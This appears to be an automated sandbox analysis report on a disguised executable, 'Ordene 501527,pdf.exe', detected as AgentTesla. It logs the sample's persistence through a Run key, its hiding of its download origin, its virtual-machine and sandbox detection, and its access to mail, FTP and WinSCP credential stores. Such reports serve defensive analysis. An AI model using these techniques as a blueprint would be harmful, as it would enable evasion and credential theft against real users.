Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig\Hjemmeopgaven	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig\Hjemmeopgaven\vrkstedsbygninger	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Perciform\Selskabelig\Hjemmeopgaven\vrkstedsbygninger\Ricciaceae185.Inc	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\edit-cut-symbolic.svg	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run flex			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run flex			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Users\user\AppData\Roaming\flex\flex.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Ordene 501527,pdf.exe, 00000001.00000002.39990362848.00000000038B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOKERNELBASE.DLLSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990362848.00000000038B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Ordene 501527,pdf.exe, 00000001.00000002.39988097728.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
Source: Ordene 501527,pdf.exe, 00000001.00000002.39988097728.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2560	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe TID: 5948	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd84B6.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\Microsoft.Office.Tools.Common.v9.0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Misundes\Caesural4\Kvalitative209\FanControlWrapper.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9410

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Code function: 1_2_004065A2 FindFirstFileW,FindClose,		1_2_004065A2
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	Code function: 1_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		1_2_0040596D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	API call chain: ExitProcess graph end node			graph_1-1311
Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe	API call chain: ExitProcess graph end node			graph_1-1492

Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990362848.00000000038B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoKERNELBASE.DLLshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 00000009.00000002.44498257269.0000000001498000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000009.00000002.44499138063.00000000014F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990362848.00000000038B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: Ordene 501527,pdf.exe, 00000001.00000002.39988097728.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Ordene 501527,pdf.exe, 00000001.00000002.39988097728.0000000000928000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: Ordene 501527,pdf.exe, 00000001.00000002.39990823877.0000000010059000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Queries volume information: C:\Users\user\AppData\Roaming\flex\flex.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\flex\flex.exe	Queries volume information: C:\Users\user\AppData\Roaming\flex\flex.exe VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Ordene 501527,pdf.exe

1_2_00403350

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.44517603260.000000001D981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 4428, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

